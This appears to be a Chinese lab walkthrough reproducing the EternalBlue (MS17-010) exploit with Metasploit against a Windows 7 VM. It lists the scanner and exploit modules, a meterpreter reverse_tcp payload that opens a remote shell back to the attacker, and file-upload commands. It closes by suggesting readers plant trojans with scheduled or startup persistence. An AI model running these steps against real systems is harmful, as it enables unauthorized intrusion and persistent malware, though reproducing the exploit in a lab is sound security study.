永恒之蓝漏洞复现

实验环境:
kali2018.2虚拟机及windows7sp1虚拟机,windosws7为靶机
win7的ip地址:192.168.0.101
在这里插入图片描述

kali的ip地址:192,。168.0.105
在这里插入图片描述

确保二者能够通信
在这里插入图片描述
接下来,查看kali的msf所需的数据库postgresql是否开启
在这里插入图片描述
active,说明OK,接下来开启msf

msfconsole

在这里插入图片描述
启动成功,并且没有数据库未开启的警告,说明postgresql开启并支持msf
接下来利用msf自带的漏洞库

search eternalblue

当然如果知道漏洞编号也可以直接search ms17_010

在这里插入图片描述
先使用第二个扫描模块,再使用第三个攻击模块

use auxiliary/scanner/smb/smb_ms17_010
set RHOST 192.168.0.101

这里的RHOST就是靶机的ip地址。
在这里插入图片描述
设置好这些之后我们运行一下扫描模块

在这里插入图片描述
检测结果显示靶机对MS17_010脆弱,可以放心大胆地搞它了。

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.101
set LHOST 192.168.0.105
set payload windows/x64/meterpreter/reverse_tcp

这里的LHOST为kali攻击者的地址,也就是后面反弹shell的目标
payload 一定要设置,不设置的话只能进入到对方c:\windows\system32目录下的cmd,不能进入meterpreter,也就没那么好玩了
在这里插入图片描述
最后,攻击

exploit

在这里插入图片描述
攻击成功,进入meterpreter

shell

输入shell进入对方的cmd
在这里插入图片描述

exit

退出shell进入meterpreter
这次我们就上传一个haha.txt吧

upload /root/Desktop/haha.txt c:/windows/system32/haha.txt

在这里插入图片描述

在这里插入图片描述

当然,读者也可以上传一些木马,并且设置时间任务,让其在特定时间自动运行,也可以将其放到windows7开机自启目录下,让其一开机就运行。这些就留给读者自己实践了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值